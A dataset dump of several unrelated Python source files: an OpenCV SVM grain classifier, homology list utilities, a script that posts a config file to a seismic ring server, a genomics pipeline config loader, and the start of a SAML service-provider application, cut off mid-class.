hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f88380005fdf72aec41b2332e31913dae1f756f6 | 7,742 | py | Python | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
"""The SVM class implements a support vector machine classification."""
def __init__(self, parent):
"""
Create a new dialog window to perform SVM classification.
Get image data from :param:`parent`.
:param parent: The image to classificate
:type parent: :class:`image.Image`
"""
super().__init__()
self.init_ui(self)
self.img_data = parent.data.copy()
self.current_img_data = None
self.training_data = None
self.training_shape = None
self.training_labels = None
self.svm = ml.SVM_create()
self.svm_accuracy = None
self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
self.train_SVM()
self.make_predictions()
self.__retranslate_ui()
self.update_img_preview()
def __retranslate_ui(self):
"""Set the text and titles of the widgets."""
_translate = QCoreApplication.translate
_window_title = "SVM Classification"
_svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
_training_data = f"The training data has {self.training_shape[1]} features (properties) " \
f"and {self.training_shape[0]} examples"
_svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
_objects_colors = "The objects classified as rice have green contours, " \
"beans have blue, and lentils have red ones"
self.setWindowTitle(_window_title)
self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
self.label_training_data.setText(_translate(_window_title, _training_data))
self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
self.label_objects_colors.setText(_translate(_window_title, _objects_colors))
def get_features(self, img_data):
"""Return vector of properties for all found objects in the image."""
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
features = empty((29, 0))
for contour in contours:
obj_moments = moments(contour)
moments_values = obj_moments.values()
moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
area = contourArea(contour)
perimeter = arcLength(contour, True)
_, _, width, height = boundingRect(contour)
aspect_ratio = float(width) / height
rect_area = width * height
extent = float(area) / rect_area
equivalent_diameter = sqrt(4 * area / pi)
feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
feature_vector = vstack((moments_values, feature_vector))
features = hstack((features, feature_vector))
return features
def get_labels(self, input_features, label_class=1):
"""Return the vector of labeled properties."""
shape = input_features.shape
out = ones((shape[1], 1))
return out * label_class
def update_training_data(self):
"""Calculate properties and labels of training data."""
img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
features1 = self.get_features(img)
features1 = delete(features1, features1.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
features2 = self.get_features(img)
features2 = delete(features2, features2.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
features3 = self.get_features(img)
features3 = delete(features3, features3.shape[1] - 1, axis=1)
self.training_data = float32(
concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
)
self.training_shape = self.training_data.shape
label1 = self.get_labels(features1, 1)
label2 = self.get_labels(features2, 2)
label3 = self.get_labels(features3, 3)
self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))
def train_SVM(self):
"""Train the SVM on calculated training data."""
self.update_training_data()
self.svm.setType(ml.SVM_C_SVC)
self.svm.setKernel(ml.SVM_LINEAR)
self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
self.update_svm_accuracy()
def update_svm_accuracy(self):
"""Calculate SVM accuracy and confusion matrix."""
prediction = self.svm.predict(self.training_data)[1]
self.svm_accuracy = accuracy_score(self.training_labels, prediction)
self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
display_labels=['rice', 'lentils', 'beans'])
self.cm_display.plot()
self.cm_canvas = FigureCanvas(plt.gcf())
self.layout_preview.addWidget(self.cm_canvas)
self.cm_canvas.draw()
self.cm_canvas.setVisible(False)
def make_predictions(self):
"""Predict object classification."""
img_data = self.img_data.copy()
features = self.get_features(img_data)
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
img_data = cvtColor(img_data, COLOR_GRAY2RGB)
for i in range(len(contours)):
feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
response = self.svm.predict(feature_predict)[1]
contour = contours[i]
if response == 1:
drawContours(img_data, [contour], 0, (0, 255, 0), 3)
elif response == 2:
drawContours(img_data, [contour], 0, (0, 0, 255), 3)
elif response == 3:
drawContours(img_data, [contour], 0, (255, 0, 0), 3)
else:
drawContours(img_data, [contour], 0, (255, 255, 255), 3)
self.current_img_data = img_data
def update_cm(self):
"""Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
if self.rbtn_show_confusion_matrix.isChecked():
self.cm_canvas.setVisible(True)
self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
else:
self.cm_canvas.setVisible(False)
self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
self.adjustSize()
| 40.322917 | 111 | 0.652803 | import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
"""The SVM class implements a support vector machine classification."""
def __init__(self, parent):
"""
Create a new dialog window to perform SVM classification.
Get image data from :param:`parent`.
:param parent: The image to classificate
:type parent: :class:`image.Image`
"""
super().__init__()
self.init_ui(self)
self.img_data = parent.data.copy()
self.current_img_data = None
self.training_data = None
self.training_shape = None
self.training_labels = None
self.svm = ml.SVM_create()
self.svm_accuracy = None
self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
self.train_SVM()
self.make_predictions()
self.__retranslate_ui()
self.update_img_preview()
def __retranslate_ui(self):
"""Set the text and titles of the widgets."""
_translate = QCoreApplication.translate
_window_title = "SVM Classification"
_svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
_training_data = f"The training data has {self.training_shape[1]} features (properties) " \
f"and {self.training_shape[0]} examples"
_svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
_objects_colors = "The objects classified as rice have green contours, " \
"beans have blue, and lentils have red ones"
self.setWindowTitle(_window_title)
self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
self.label_training_data.setText(_translate(_window_title, _training_data))
self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
self.label_objects_colors.setText(_translate(_window_title, _objects_colors))
def get_features(self, img_data):
"""Return vector of properties for all found objects in the image."""
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
features = empty((29, 0))
for contour in contours:
obj_moments = moments(contour)
moments_values = obj_moments.values()
moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
area = contourArea(contour)
perimeter = arcLength(contour, True)
_, _, width, height = boundingRect(contour)
aspect_ratio = float(width) / height
rect_area = width * height
extent = float(area) / rect_area
equivalent_diameter = sqrt(4 * area / pi)
feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
feature_vector = vstack((moments_values, feature_vector))
features = hstack((features, feature_vector))
return features
def get_labels(self, input_features, label_class=1):
"""Return the vector of labeled properties."""
shape = input_features.shape
out = ones((shape[1], 1))
return out * label_class
def update_training_data(self):
"""Calculate properties and labels of training data."""
img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
features1 = self.get_features(img)
features1 = delete(features1, features1.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
features2 = self.get_features(img)
features2 = delete(features2, features2.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
features3 = self.get_features(img)
features3 = delete(features3, features3.shape[1] - 1, axis=1)
self.training_data = float32(
concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
)
self.training_shape = self.training_data.shape
label1 = self.get_labels(features1, 1)
label2 = self.get_labels(features2, 2)
label3 = self.get_labels(features3, 3)
self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))
def train_SVM(self):
"""Train the SVM on calculated training data."""
self.update_training_data()
self.svm.setType(ml.SVM_C_SVC)
self.svm.setKernel(ml.SVM_LINEAR)
self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
self.update_svm_accuracy()
def update_svm_accuracy(self):
"""Calculate SVM accuracy and confusion matrix."""
prediction = self.svm.predict(self.training_data)[1]
self.svm_accuracy = accuracy_score(self.training_labels, prediction)
self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
display_labels=['rice', 'lentils', 'beans'])
self.cm_display.plot()
self.cm_canvas = FigureCanvas(plt.gcf())
self.layout_preview.addWidget(self.cm_canvas)
self.cm_canvas.draw()
self.cm_canvas.setVisible(False)
def make_predictions(self):
"""Predict object classification."""
img_data = self.img_data.copy()
features = self.get_features(img_data)
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
img_data = cvtColor(img_data, COLOR_GRAY2RGB)
for i in range(len(contours)):
feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
response = self.svm.predict(feature_predict)[1]
contour = contours[i]
if response == 1:
drawContours(img_data, [contour], 0, (0, 255, 0), 3)
elif response == 2:
drawContours(img_data, [contour], 0, (0, 0, 255), 3)
elif response == 3:
drawContours(img_data, [contour], 0, (255, 0, 0), 3)
else:
drawContours(img_data, [contour], 0, (255, 255, 255), 3)
self.current_img_data = img_data
def update_cm(self):
"""Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
if self.rbtn_show_confusion_matrix.isChecked():
self.cm_canvas.setVisible(True)
self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
else:
self.cm_canvas.setVisible(False)
self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
self.adjustSize()
| 0 | 0 | 0 |
f3f3e74dbdb66c3eeb72f5d95fff49cb5739f5aa | 3,505 | py | Python | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | from collections import deque
| 30.745614 | 123 | 0.532097 | from collections import deque
class Utils():
@staticmethod
def calculate_index( aiC_U_ajC, top, Udot ):
"""
Calculate Index
PARAMETERS
----------
aiC_U_ajC : :class:' set'
top : :class:' set'
Udot : :class:' set'
"""
index= {}
t = sorted(top)
u = sorted(Udot)
for v in aiC_U_ajC:
index[v] = (t.index(v)+u.index(v))%2 #interesante hacer optimización aquí
return index
@staticmethod
def make_vector(ones, length):
"""
makevector transforma la sucesion de números S(i)(1) = (x1,...,xk)en un vector de longitud
simplexsize(S(i)(0)) cuyas posicionesx1,...,xkvalen 1 y el resto de las posiciones valen 0.
PARAMETERS
----------
s : :class: 'iterable'
"""
return [True if k in ones else False for k in range(1,length+1)]
@staticmethod
def unmake_vector(v):
"""
unmakevector
PARAMETERS
----------
v : :class: 'iterable'
returns:
z
"""
unmaked=[]
for k in range(0,len(v)):
if v[k]:
unmaked.append(k+1)
return unmaked
@staticmethod
def isBiggerList(bigger, smaller, or_equal=False):
if len(bigger) != len(smaller):
return False
for k in range(len(bigger)-1, 0, -1):
if(bigger[k]!=smaller[k]):
return bigger[k]>smaller[k]
if(or_equal):
return True
return False
@staticmethod
def isSmallerList(smaller, bigger, or_equal=False):
Utils.isBiggerList(smaller, bigger, not or_equal)
return False
@staticmethod
def mixLists(bigger, smaller):
'''
bigger(1,2,3)
smaller=(4,5)
mix=(1,4,2,5,3)
'''
if not len(bigger) == len(smaller)+1:
return False
result=[]
for k in range(0,len(smaller)):
result.append(bigger[k])
result.append(smaller[k])
result.append(bigger[-1])
return result
@staticmethod
def ordered_union(priorityList,extension, at_the_begining):
resulting_list = deque(priorityList)
to_add=[x for x in extension if x not in priorityList]
if at_the_begining:
to_add.reverse()
resulting_list.extendleft(to_add)
else:
resulting_list.extend(to_add)
return list(resulting_list)
@staticmethod
def ordered_difference(priorityList,difference):
resulting_list = [x for x in priorityList if x not in difference]
return resulting_list
@staticmethod
def intersection(list1,list2):
resulting_list = [x for x in list1 if x in list2]
return resulting_list
'''def vectToWect(Si, X,ai,aic):
''
Si=(2,3,5,6) (ej)
''
vect_i=makeVector(Si)
aiUaic=ai.union(aic)
#wectj=vectj∗partial(aj∪ ̄aj(0), ̄aj(0))∗partial( aj ∪ aj(0 : 1), ̄aj(1))∗...∗partial(aj ∪ ̄aj, ̄aj(−1));
# * = producto de matrices? -> transponer los índices pares (?)
for aii, index in enumerate(aic):
vect_i=np.matmul(vect_i,X.get_partial(aiUaic, aii) if index%2==1 else np.transpose(X.get_partial(aiUaic, aii)))
return unmakevector(vect_i)'''
| 968 | 2,486 | 22 |
104572a8ccb0d0755cba08b5cf533bc06da49b4a | 12,012 | py | Python | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | 12 | 2018-11-27T16:18:16.000Z | 2020-01-10T03:17:26.000Z | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | null | null | null | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | 1 | 2019-04-12T18:34:22.000Z | 2019-04-12T18:34:22.000Z | import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"
if __name__ == "__main__":
# execute only if run as a script
parser = argparse.ArgumentParser()
parser.add_argument("-t",
dest="tokenFile",
type=argparse.FileType('r'),
help="tokenfile, encoded on first line")
parser.add_argument("-i",
dest="interval",
type=int,
default=60,
help="send time interval in seconds")
args = parser.parse_args()
sender = SendConfig(args.interval, args.tokenFile)
signal.signal(signal.SIGINT, handleSignal)
signal.signal(signal.SIGTERM, handleSignal)
sender.run()
| 42 | 128 | 0.542791 | import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"
class SendConfig:
def __init__(self, intervalSecs, tokenFile):
self.verbose = True
self.token = None
self.tokenFilename = None
if tokenFile is not None:
print("init tokenFile: {}, name: ".format(tokenFile, tokenFile.name))
self.tokenFilename = tokenFile.name
self.token = tokenFile.readline().strip()
self.net = "XX"
self.sta = self.getLocalHostname()[0:5].upper()
if self.verbose:
print("set station code to {}".format(self.sta))
self.interval = intervalSecs # sleep in seconds
#self.host = "129.252.35.36"
#self.port = 15003
self.host ="74.207.233.105"
self.port = 6382
self.uri = "ws://www.seis.sc.edu/dragracews/datalink"
self.programname="sendConfig"
self.username="dragrace"
self.processid=0
self.architecture="python"
self.daliUpload = None
self.keepGoing = True
def reloadToken(self):
if self.tokenFilename is not None:
with open(self.tokenFilename) as f:
self.token = f.readline().strip()
return self.token
def getLocalHostname(self):
hostname = socket.gethostname().split('.')[0]
return hostname.strip()
def exceptionHandler(self, loop, context):
if self.daliUpload is not None:
self.daliUpload.close()
self.daliUpload = None
print("oh noooooo, {}".format(context['message']));
async def authorize(self):
if self.token:
authResp = await self.daliUpload.auth(self.token)
if self.verbose:
print("auth: {}".format(authResp))
if authResp.type == 'ERROR':
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
raise Exception("AUTHORIZATION failed, {} {}".format(authResp.type, authResp.message))
async def initConnections(self, daliUpload):
if self.daliUpload is None:
# create a separate upload datalink
self.daliUpload = simpleDali.SocketDataLink(self.host, self.port)
#self.daliUpload = simpleDali.WebSocketDataLink(self.uri)
else:
self.daliUpload.reconnect()
#daliUpload.verbose = True
await self.authorize()
serverId = await self.daliUpload.id(self.programname, self.username, self.processid, self.architecture)
if self.verbose:
print("Connect Upload: {}".format(serverId))
return self.daliUpload
def run(self):
loop = asyncio.get_event_loop()
loop.set_exception_handler(self.exceptionHandler)
repeatException = False
while self.keepGoing:
try:
if self.token is not None and simpleDali.timeUntilExpireToken(self.token) < timedelta(0):
# maybe someone gave us a new one?
if self.verbose:
print("token expired, reloading")
self.reloadToken()
if self.token is not None and simpleDali.timeUntilExpireToken(self.token) < timedelta(0):
raise Exception("Expired token in {}...".format(self.tokenFilename))
if self.daliUpload is None or self.daliUpload.isClosed():
# first time or maybe something bad happened
initTask = loop.create_task(self.initConnections(self.daliUpload))
loop.run_until_complete(initTask)
if initTask.exception() is not None:
raise initTask.exception()
self.daliUpload = initTask.result()
starttime = simpleDali.utcnowWithTz()
oldfile=deployDir+"/config_deployed"
newfile=prepDir+"/config_new"
archivefile=archiveDir+"/config_deployed"
if(filecmp.cmp(oldfile,newfile)):
# Files are the same, no action required
noChange=True
print("Config file has not changed, sending anyway")
json_file=open(oldfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
else:
# Files are different, process the new one
noChange=False
json_file=open(newfile,'r')
goodConfig=configChecker.configSanityCheck(json_file)
json_file.close()
if(not goodConfig):
print("Config file fails ... re-posting old file")
json_file=open(oldfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
else:
#
# OK, archive the old config and post the new once
#
print("New Config File is OK ... making it official and posting to ringserver")
shutil.move(oldfile,archivefile+"_"+starttime.isoformat())
shutil.copy2(newfile,oldfile)
json_file=open(newfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
except Exception:
if self.daliUpload is not None:
self.daliUpload.close()
if not repeatException:
print(traceback.format_exc())
repeatException = True
sys.stdout.flush()
for tempSleep in range(self.interval):
# sleep for interval seconds, but check to see if we should
# quit once a second
if self.keepGoing:
time.sleep(1)
loop.run_until_complete(loop.create_task(self.daliUpload.close()))
loop.close()
# end run()
def handleSignal(sigNum, stackFrame):
print("############ handleSignal {} ############".format(sigNum))
global sender
if sender is not None and sender.keepGoing:
sender.keepGoing = False
else:
sys.exit(0)
if __name__ == "__main__":
# execute only if run as a script
parser = argparse.ArgumentParser()
parser.add_argument("-t",
dest="tokenFile",
type=argparse.FileType('r'),
help="tokenfile, encoded on first line")
parser.add_argument("-i",
dest="interval",
type=int,
default=60,
help="send time interval in seconds")
args = parser.parse_args()
sender = SendConfig(args.interval, args.tokenFile)
signal.signal(signal.SIGINT, handleSignal)
signal.signal(signal.SIGTERM, handleSignal)
sender.run()
| 10,349 | -4 | 234 |
bb1f0421abd7c4f41cf11d86404f6403f7af7587 | 832 | py | Python | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| 26.83871 | 70 | 0.772837 | #!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| 0 | 0 | 0 |
2672c05fc5faec2576b9d7fe6a08752dbcc31a12 | 5,115 | py | Python | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
| 35.520833 | 82 | 0.516129 | import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
class Application():
    """CherryPy application object for the entity-category verifier.

    Wires one SSO handler and one ACS handler per configured SP instance
    (keyed by entity-category test name; '' maps to the 'base' test) and
    exposes the test/overview/disco/login/ecat pages.
    """
    def __init__(self, sp, cache, lookup, ec_sequence, ec_information,
                 res_db, sso_args, policy):
        self.sp = sp
        self.cache = cache
        self.lookup = lookup
        self.ec_sequence = ec_sequence
        self.ec_information = ec_information
        self.res_db = res_db
        # One SSO front-end per SP, sharing the cache and common kwargs.
        self.sso = dict(
            [(e, SSO(s, cache=cache, **sso_args)) for e, s in sp.items()])
